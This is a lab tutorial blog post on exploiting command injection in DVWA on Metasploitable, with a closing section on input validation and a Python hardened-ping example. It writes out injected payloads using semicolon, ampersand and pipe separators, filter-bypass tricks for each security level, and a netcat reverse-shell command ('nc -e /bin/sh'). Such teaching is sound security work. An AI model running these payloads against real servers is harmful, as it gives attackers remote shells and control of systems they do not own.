A command injection vulnerability allows an attacker to run arbitrary operating system commands on the target web server: if the server runs Windows, Windows commands; if it runs Linux, Linux commands.
Clearly this is a critical class of vulnerability, as it can give a hacker full control of the system: access to sensitive data, the ability to upload and download files, to change user security levels, and so on.
In this post, we are going to use a command injection vulnerability to gain access to the target web server through a reverse shell, and we will also cover how to secure your web server against this type of attack.
Warning: This is for educational purpose only, I or TechSphinx shall not be held responsible for your illegal actions.
- Kali Linux and Metasploitable (If you don’t know how to set up these, check out this post.)
- Able to read and understand the above written “warning”.
Start your Kali and Metasploitable VMs, and log in to DVWA.
Now head over to the Command Injection tab and enter an IP address to ping. (I am using the IP of my Kali machine, i.e. 10.0.2.15.)
You’ll see the output of the ping command.
Before we start exploiting the vulnerability, let’s try to understand what is going on in the background.
Whenever a user enters an IP address, the web server runs it with the command:
ping -c 4 10.0.2.15
Open a terminal in your Kali machine and try the same ping command there.
In Linux, if you want to run multiple commands on one line, you use a command separator (the semicolon “;”).
Now, let’s try to exploit the command injection vulnerability.
1.) Navigate to the DVWA Security tab and change the security level to low.
2.) Now type the IP and the “pwd” command (which shows the present working directory), joined by the separator.
10.0.2.15 ; pwd
3.) Now, let’s try to get a reverse shell. There are many ways to get a reverse shell, but in this post we are going to use “nc” (netcat).
First, open a terminal and start a listener.
nc -vv -l -p 8080
nc: the tool we are using.
-vv: verbose, to show any output.
-l: start listening.
-p 8080: the port on which the program will listen.
Now, go to the DVWA Command Injection tab and enter the IP and the nc command, joined by a separator.
10.0.2.15 ; nc -e /bin/sh 10.0.2.15 8080
nc: the program to run.
-e /bin/sh: the program to execute once the connection is established.
10.0.2.15: the IP where our listener is running.
8080: the port on which the listener is listening.
Instead of a semicolon (;) you can also use a double ampersand (&&).
10.0.2.15 && nc -e /bin/sh 10.0.2.15 8080
4.) Once we get the reverse shell, we can run any Linux command, such as “ls”, “uname -a”, etc.
We’ve successfully exploited the low difficulty level; now let’s try the medium difficulty level.
1.) Change the DVWA security level to medium.
2.) Try the exploit we used at low difficulty (with both the semicolon and the double ampersand). You’ll notice it no longer works, as the target is now more secure.
3.) So the target is using filters to blacklist the semicolon and the double ampersand, but what about a single ampersand? Let’s see if it works.
10.0.2.15 & dir
4.) You can see that the single ampersand works, but there are other workarounds at this security level. We can also use the pipe operator (“|”, shift + backslash key). Read more about pipe here.
Now that we have exploited the medium difficulty level, let’s go for high.
1.) Change the DVWA security level to high.
2.) Try the exploit we used at medium difficulty; it no longer works, right? Obviously, the target is more secure at high difficulty.
3.) Now the target has blacklisted all the operators, but there is still something that works. Yes! The pipe operator without a space works. If you click the View Source button below, you’ll notice it. Let’s try to exploit it using
You can type any one-word command such as pwd, ls, dir, id, uname, etc., but you cannot use commands with an argument, such as uname -a, because there is a space between uname and -a and the target does not accept a space. That is why we can’t use the nc command for a reverse shell at high security.
But you can still use these one-word commands to gather information about the server and find other vulnerabilities.
The impossible level is, as its name says, impossible to break, as it contains all the security features one should implement to secure a web server against a command injection vulnerability.
Secure against a command injection vulnerability
- Analyse the user’s input.
- Use filters and regular expressions to reject any unexpected input.
This is what the impossible difficulty level does. For example, if the target web server accepts an IPv4 address (as DVWA does), analyse the input and make sure it consists of exactly four numbers separated by periods (“.”), i.e. “number.number.number.number”, and use filters to reject anything else. Have a look at the impossible difficulty source code.
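As an added example (my own code, not DVWA’s PHP source), here is the same idea in Python: a strict IPv4 validator in front of a ping wrapper that passes the validated address as its own argument and never goes through a shell. The function names and the sample inputs in the comments are my own.

```python
import re
import subprocess

# Strict "number.number.number.number" pattern: anchored at both ends, so
# separators like ";", "&", "|" or a space can never get through.
IPV4_RE = re.compile(r"^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$")


def validate_ipv4(user_input: str):
    """Return the canonical dotted-quad string, or None if the input is not
    exactly four octets (0-255) separated by periods."""
    m = IPV4_RE.match(user_input.strip())
    if not m:
        return None
    octets = [int(o) for o in m.groups()]
    if any(o > 255 for o in octets):
        return None
    return ".".join(str(o) for o in octets)


def build_ping_argv(user_input: str):
    """Hardened version of the page's 'ping -c 4 <ip>' feature.

    The validated address becomes a single argv element. Because the
    command is run without a shell (no string concatenation, no shell=True),
    any metacharacter that slipped past validation would reach ping as a
    literal string instead of starting a second command.
    """
    ip = validate_ipv4(user_input)
    if ip is None:
        raise ValueError("Invalid IPv4 address")
    return ["ping", "-c", "4", ip]


def ping(user_input: str) -> str:
    """Run the hardened ping and return its output."""
    argv = build_ping_argv(user_input)
    result = subprocess.run(argv, capture_output=True, text=True, check=False)
    return result.stdout


if __name__ == "__main__":
    # Constructed inputs: the first is a valid target, the second is the
    # kind of payload used at the low level of this post and is rejected.
    print(build_ping_argv("10.0.2.15"))
    try:
        build_ping_argv("10.0.2.15 ; pwd")
    except ValueError as exc:
        print("rejected:", exc)
```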
Now you know how to exploit a command injection vulnerability and how to secure against one. Go ahead and practise, and share your opinions in the comment section.